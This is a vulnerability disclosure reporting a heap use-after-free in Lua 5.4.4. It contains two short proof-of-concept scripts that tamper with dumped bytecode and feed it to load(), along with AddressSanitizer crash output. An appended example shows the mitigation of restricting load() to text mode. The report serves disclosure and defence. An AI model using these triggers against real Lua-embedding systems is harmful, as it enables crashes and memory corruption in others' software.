Hi,
A heap use-after-free is detected in lua (version 5.4.4, git commit: 5d708c3f9cae12820e415d4f89c9eacbe2ab964b. The release version 5.4.4 is also affected.)
poc.lua:
---
maybe = string.dump(function() return ({[tr_e]=true})[true] end)
maybe = maybe:gsub('\1\1',']1\2')
maybe = load(maybe)()
---
When building with -fsanitize=address and executing "./lua poc.lua", we get the following crash info:
---
=================================================================
==3588130==ERROR: AddressSanitizer: heap-use-after-free on address 0x6170000006d8 at pc 0x5555556d08fa bp 0x7fffffffd490 sp 0x7fffffffd488
READ of size 1 at 0x6170000006d8 thread T0
#0 0x5555556d08f9 in luaV_execute lua_fuzz/lua/lvm.c:1326:13
#1 0x5555556739f5 in ccall lua/ldo.c:641:5
#2 0x5555556739f5 in luaD_callnoyield lua/ldo.c:659:3
#3 0x55555566e68c in luaD_rawrunprotected lua/ldo.c:144:3
#4 0x5555556753f4 in luaD_pcall lua/ldo.c:957:12
#5 0x55555565e6da in lua_pcallk lua/lapi.c:1064:14
#6 0x55555564fdc3 in docall lua/lua.c:160:12
#7 0x55555564ef32 in handle_script lua/lua.c:256:14
#8 0x55555564ef32 in pmain lua/lua.c:645:9
---
Without asan it prints the following:
---
./lua/lua: ./poc.lua:1: table index is nil
stack traceback:
./poc.lua:1: in function <./poc.lua:1>
./poc.lua:3: in main chunk
[C]: in ?
---
A variant poc can trigger a crash in the default build without ASan:
---
ma0be=string.dump(
function()
return({[e]=true})[true]end)
ma0be=ma0be:gsub('\1\1','')
m=load(ma0be)((0)and 0)
---
--
Best Wishes,
Yongheng Chen
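Both PoCs in this report work by feeding load() a precompiled (binary) chunk that has been tampered with; Lua's undump stage does not validate bytecode, so any script that calls load() on untrusted input inherits this. The added example below is not part of the report or of Lua itself; it shows the standard mitigation, restricting load() to source-text chunks with mode "t" so that every binary chunk, including a dumped-and-modified one, is refused before the VM ever sees it. The helper name load_text_only is an assumption for illustration.

```lua
-- Added example (not from the bug report): refuse precompiled chunks.
-- load(chunk, name, mode): mode "t" accepts only source text, "b" only
-- bytecode, "bt" (the default) accepts both. Untrusted input should
-- never reach the "b" path, because undump does not verify bytecode.

-- Hypothetical helper: wrap load() so callers cannot pass bytecode.
local function load_text_only(chunk, name)
  return load(chunk, name or "=untrusted", "t")
end

-- Constructed input: a binary chunk produced by string.dump, the same
-- kind of payload the PoCs start from before they patch bytes in it.
local binary_chunk = string.dump(function() return ({[tr_e] = true})[true] end)
assert(binary_chunk:sub(1, 1) == "\27", "string.dump output starts with ESC")

-- With mode "t" the chunk is rejected; no function is returned.
local fn, err = load_text_only(binary_chunk, "=poc")
assert(fn == nil)
print("rejected:", err)  -- e.g. attempt to load a binary chunk (mode is 't')

-- Ordinary source text is still accepted, so the restriction costs nothing
-- for legitimate scripts.
local ok_fn = assert(load_text_only("return 1 + 1", "=ok"))
assert(ok_fn() == 2)
```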